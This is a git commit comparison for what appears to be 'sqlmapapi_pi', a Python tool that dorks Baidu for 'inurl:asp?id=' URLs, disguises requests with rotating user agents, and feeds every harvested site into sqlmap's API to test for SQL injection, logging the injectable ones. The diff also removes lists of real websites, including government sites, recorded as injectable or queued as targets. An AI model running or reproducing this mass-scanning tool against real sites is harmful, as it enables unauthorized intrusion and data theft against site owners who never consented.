Compare commits


10 Commits

Author       SHA1         Message                                      Date
wps2015      57d47e8a00   Update README.md                             2022-03-23 16:17:15 +08:00
wps2015      ef2da26e23   add directory                                2016-08-27 17:43:33 +08:00
                          ee
wps2015      e4b03bf86d   Merge pull request #2 from yobo000/master    2016-08-02 15:15:35 +08:00
                          Add logging & argparse by my poor insignificant skill
jingbo-you   4d9755bf5e   happy birthday KB                            2016-08-02 14:56:15 +08:00
jingbo-you   84a098efbb   add ignore                                   2016-08-02 14:52:46 +08:00
wps2015      8f8ebddb95   readme update                                2016-05-17 19:01:50 +08:00
wps2015      a2267acb0c   readme update                                2016-05-17 18:59:34 +08:00
wps2015      ee4cd19f36   Update and rename README to README.md        2015-12-03 15:54:13 +08:00
sowish       69b595c060   Update description                           2015-12-03 15:41:06 +08:00
sowish       0d74222aaa   Update description                           2015-12-03 15:33:41 +08:00
10 changed files with 127 additions and 76 deletions

.gitignore vendored Normal file (4 changes)

@@ -0,0 +1,4 @@
*.pyc
.DS_Store
*.log
data/*.*

AutoSqli.py

@@ -1,20 +1,22 @@
#!/usr/bin/python
#-*-coding:utf-8-*-
from __future__ import absolute_import, print_function
import requests
import time
import json
import threading
import Queue
from search.baidu import *
from search import baidu
import logging
from config import LOG, API_URL
class AutoSqli(object):
"""
Interact with the server established by sqlmapapi, using sqlmapapi's methods.
"""
def __init__(self, server='', target='',data = '',referer = '',cookie = ''):
super(AutoSqli, self).__init__()
self.server = server
@@ -28,14 +30,19 @@ class AutoSqli(object):
self.referer = referer
self.cookie = cookie
self.start_time = time.time()
self.logger = logging.getLogger('app.run')
self.logger.info('Creating an instance of AutoSqli for {0}.'.format(self.target))
def task_new(self):
try:
self.taskid = json.loads(
requests.get(self.server + 'task/new').text)['taskid']
#print 'Created new task: ' + self.taskid
if len(self.taskid) > 0:
return True
return False
except requests.ConnectionError:
self.logger.error("sqlmapapi.py is not running")
def task_delete(self):
json_kill = requests.get(self.server + 'task/' + self.taskid + '/delete').text
@@ -46,7 +53,7 @@ class AutoSqli(object):
def scan_start(self):
headers = {'Content-Type': 'application/json'}
print "starting to scan "+ self.target +".................."
self.logger.debug("Starting to scan "+ self.target +"..................")
payload = {'url': self.target}
url = self.server + 'scan/' + self.taskid + '/start'
t = json.loads(
@@ -76,7 +83,8 @@ class AutoSqli(object):
else:
f = open('data/injection.txt','a')
f.write(self.target+'\n')
print 'injection \t'
f.close()
self.logger.warning('injection \t')
def option_set(self):
headers = {'Content-Type': 'application/json'}
@@ -134,28 +142,46 @@ class myThread(threading.Thread):
objects=self.q.get()
result=objects.run()
if __name__ == '__main__':
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-n', '--num', default=4, nargs='?', type=int, dest='num', help="Thread num")
parser.add_argument('-p', '--page', default=3, nargs='?', type=int, dest='page', help="Search Page num")
parser.add_argument('-d', '--log', default=LOG["filename"], nargs='?', type=str, dest='log', help="The path of debug log")
args = parser.parse_args()
logger = logging.getLogger('app')
logger.setLevel(LOG["level"])
fh = logging.FileHandler(args.log)
fh.setLevel(LOG["level"])
formatter = logging.Formatter(LOG['format'], LOG["datefmt"])
fh.setFormatter(formatter)
sh = logging.StreamHandler()
sh.setLevel(LOG["level"])
sh.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(sh)
urls = []
print 'the program starts!'
logger.info('the program starts!')
pages = args.page
key = 'inurl:asp?id='
pages=3
urls=geturl(key,pages)
urls = baidu.geturl(key, pages)
#print urls
workQueue = Queue.Queue()
for tar in urls:
s = AutoSqli('http://127.0.0.1:8775', tar)
s = AutoSqli(API_URL, tar)
workQueue.put(s)
threads = []
nloops = range(4) #threads Num
nloops = range(args.num) #threads Num
for i in nloops:
t = myThread(workQueue, i)
t.start()
threads.append(t)
for i in nloops:
threads[i].join()
print "Exiting Main Thread"
logger.info("Exiting Main Thread")
if __name__ == '__main__':
main()
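
For readers new to sqlmapapi, here is a minimal sketch of the task lifecycle that the AutoSqli class above wraps. It assumes a server started with `python sqlmapapi.py -s` at the API_URL default from config.py; `scan_once` is a hypothetical name, and the scan/status and scan/data routes are the standard sqlmapapi endpoints rather than calls shown in this diff:

```python
# Hedged sketch of one sqlmapapi round trip (not the shipped class).
import json
import time

import requests

API_URL = 'http://127.0.0.1:8775'   # same default as config.py

def scan_once(target):
    # 1. Create a task; the server answers with a taskid.
    taskid = json.loads(requests.get(API_URL + '/task/new').text)['taskid']
    try:
        # 2. Start the scan for a single URL.
        requests.post(API_URL + '/scan/' + taskid + '/start',
                      data=json.dumps({'url': target}),
                      headers={'Content-Type': 'application/json'})
        # 3. Poll until sqlmap reports the scan has terminated.
        while json.loads(requests.get(API_URL + '/scan/' + taskid +
                                      '/status').text)['status'] != 'terminated':
            time.sleep(3)
        # 4. A non-empty 'data' list means an injection was found.
        return json.loads(requests.get(API_URL + '/scan/' + taskid +
                                       '/data').text)['data']
    finally:
        # 5. Release the task on the server.
        requests.get(API_URL + '/task/' + taskid + '/delete')
```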

README (0 changes)

README.md Normal file (17 changes)

@@ -0,0 +1,17 @@
## sqlmapapi_pi batch SQL injection tool
------------
**Introduction:**
- This program is a derivative of [manning23](https://github.com/manning23)'s project; background at [click me](http://drops.wooyun.org/tips/6653).
- It uses Baidu to crawl for matching URLs, then calls sqlmapapi (sqlmap's built-in batch interface) to test each one for injection.
- The options set in AutoSqli.py can be adjusted per set_option.txt to customize how injection is judged, e.g. time-based or boolean-based techniques.
**Usage:**
- In the sqlmap directory, run `python sqlmapapi.py -s` to start the API server.
- Run AutoSqli.py with `python AutoSqli.py`; list the available flags with `-h`.
**Tips:**
* Note that the search keyword is customized in the code: `key='inurl:asp?id='`
* as is the thread count: `nloops = range(4) #threads Num` (the worker pattern is sketched after this list)
* Keep the thread count modest so the program does not lock up.
* Do not use this tool for anything illegal.
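
For orientation, a hedged sketch of the queue-and-threads pattern that main() builds from the new -n/--num flag, in the repo's Python 2 style; `worker` and `run_all` are hypothetical names, and the shipped code inlines this logic:

```python
# Hedged sketch of main()'s worker pool (Python 2, matching the repo).
import Queue
import threading

def worker(queue):
    while True:
        try:
            job = queue.get_nowait()   # an AutoSqli instance
        except Queue.Empty:
            return
        job.run()                      # one full scan via sqlmapapi

def run_all(jobs, num):                # num maps to the new -n/--num flag
    queue = Queue.Queue()
    for job in jobs:
        queue.put(job)
    threads = [threading.Thread(target=worker, args=(queue,))
               for _ in range(num)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
```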

config.py Normal file (18 changes)

@@ -0,0 +1,18 @@
#!/bin/env python
# -*- coding=utf-8 -*-
import logging
API_URL = "http://127.0.0.1:8775"
LEVELS = {'debug': logging.DEBUG,
'info': logging.INFO,
'warning': logging.WARNING,
'error': logging.ERROR,
'critical': logging.CRITICAL}
LOG = {
"level" : LEVELS["debug"],
"filename" : "autosqli.log",
"format" : '[%(asctime)s] %(levelname)-8s %(name)-12s %(message)s',
"datefmt" : '%Y-%m-%d %H:%M:%S'
}
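
Because the modules request child loggers ('app.run' in AutoSqli.py, 'app.baidu' in the crawler), the handlers that main() attaches to the parent 'app' logger serve the whole program. A minimal sketch of that propagation, assuming config.py above is on the import path:

```python
# Sketch: one configured parent logger serves every module (assumes config.py).
import logging
from config import LOG

parent = logging.getLogger('app')           # configured once in main()
parent.setLevel(LOG['level'])
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter(LOG['format'], LOG['datefmt']))
parent.addHandler(handler)

child = logging.getLogger('app.baidu')      # no handlers of its own
child.info('this record propagates up to the "app" handlers')
```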

data/injection.txt Executable file → Normal file (7 changes)

@@ -1,6 +1 @@
http://www.lamarche.com.tw/production_detail.php?shop_category=64&sn=248
http://www.70jj.com/shop/index.php?shop_id=1
http://www.cosmax.com.hk/products_detail.php?product_id=17
http://www.etron.com/en/products/u3hc_detial.php?Product_ID=5
http://www.fembooks.com.tw/indexstore.php?product_id=5423
http://www.guangzhouflower.net.cn/product.php?pid=12
http://www.example.com

(deleted file, name not shown)

@@ -1,20 +0,0 @@
http://www.99166.com/zjinfo.asp?id=5
http://www.yh8z.com/Secondary/guding.asp?Id=68&Parent_ID=18&Type_Class=news&GS_Class=22
http://www.gdkszx.com.cn/ksxx/kszc_show.asp?id=2205
http://www.smxs.gov.cn/viewtexti.asp?id=275079&npage=6
http://www.juancheng.gov.cn/wsbs-view.asp?id=9285
http://rc.sz.zj.cn/company.asp?id=4291
http://www.law-lib.com/fxj/fxj.asp?id=940
http://www.kfws.gov.cn/Article_read.asp?id=2289
http://www.zjghtcm.com/new_show.asp?id=1178
http://www.medsci.cn/sci/journal.asp?id=0bc61099
http://www.dylaw.gov.cn/zhongc/web60/classshow.asp?id=51848&classid=15
http://club.kdnet.net/dispbbs.asp?id=11095423&boardid=1
http://people.rednet.cn/PeopleShow.asp?ID=2410432
http://www.dhzsxx.com/ShowNews.asp?id=1591
http://www.chinawutong.com/co/huoyuan_01/index.asp?id=213633
http://news.chinaxinge.com/shownews.asp?id=53866&sjm=49600b363e048e05
http://www.gxxgty.com/news_show.asp?id=1583
http://szb.keq0475.com/Qnews.asp?ID=49506
http://www.cyfy.cn/kssz.asp?id=42
http://www.szkweekly.com/List.asp?ID=54284

Binary file not shown.

search/baidu.py

@@ -1,11 +1,16 @@
#coding: utf-8
from __future__ import unicode_literals
import urllib2
import string
import urllib
import re
import random
import logging
user_agents = ['Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0', \
__all__ = ["geturl"]
USER_AGENTS = ['Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0', \
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0', \
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533+ \
(KHTML, like Gecko) Element Browser 5.0', \
@@ -18,11 +23,14 @@ user_agents = ['Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Fire
Chrome/28.0.1468.0 Safari/537.36', \
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; TheWorld)']
logger = logging.getLogger('app.baidu')
def baidu_search(keyword, pn):
p = {'wd': keyword}
res = urllib2.urlopen(("http://www.baidu.com/s?"+urllib.urlencode(p)+"&pn={0}&cl=3&rn=10").format(pn)) # rn sets the results per page; pn is the offset of the first result shown
html = res.read()
return html
def getList(regex, text): # dedupe the matched URLs and collect them into a list
arr = []
res = re.findall(regex, text)
@@ -30,11 +38,13 @@ def getList(regex,text): # dedupe the matched URLs and collect them into a list
for r in res:
arr.append(r)
return arr
def getMatch(regex, text): # matching helper: first regex match, or ''
res = re.findall(regex, text)
if res:
return res[0]
return ''
def is_get(url): # is this a GET-style link that sqlmap can recognize?
regex = r'(\S*?)\?.*=.*'
res = re.match(regex,url)
@@ -64,8 +74,8 @@ def geturl(keyword,pages): # fetch URLs
url = link[1] # Baidu's rewritten (redirect) URL
try:
domain = urllib2.Request(url)
r=random.randint(0,11)
domain.add_header('User-agent', user_agents[r])
r = random.randint(0, len(USER_AGENTS) - 1)
domain.add_header('User-agent', USER_AGENTS[r])
domain.add_header('connection', 'keep-alive')
response = urllib2.urlopen(domain)
uri = response.geturl() # resolve the real URL behind the redirect
@@ -80,9 +90,10 @@ def geturl(keyword,pages): #获取url
f1.close()
except:
continue
print "urls have been grabed already!!!"
logger.info("urls have been grabbed already!!!")
return targets
if __name__ == '__main__':
pass
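
As a quick illustration of the is_get() filter above, a hedged standalone restatement with the regex copied from the diff:

```python
# Standalone restatement of is_get(): keep only URLs whose query string
# gives sqlmap a GET parameter to fuzz (e.g. asp?id=...).
import re

def is_get(url):
    return re.match(r'(\S*?)\?.*=.*', url) is not None

print(is_get('http://example.com/view.asp?id=5'))   # True: has id= parameter
print(is_get('http://example.com/about.html'))      # False: nothing to test
```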

Binary file not shown.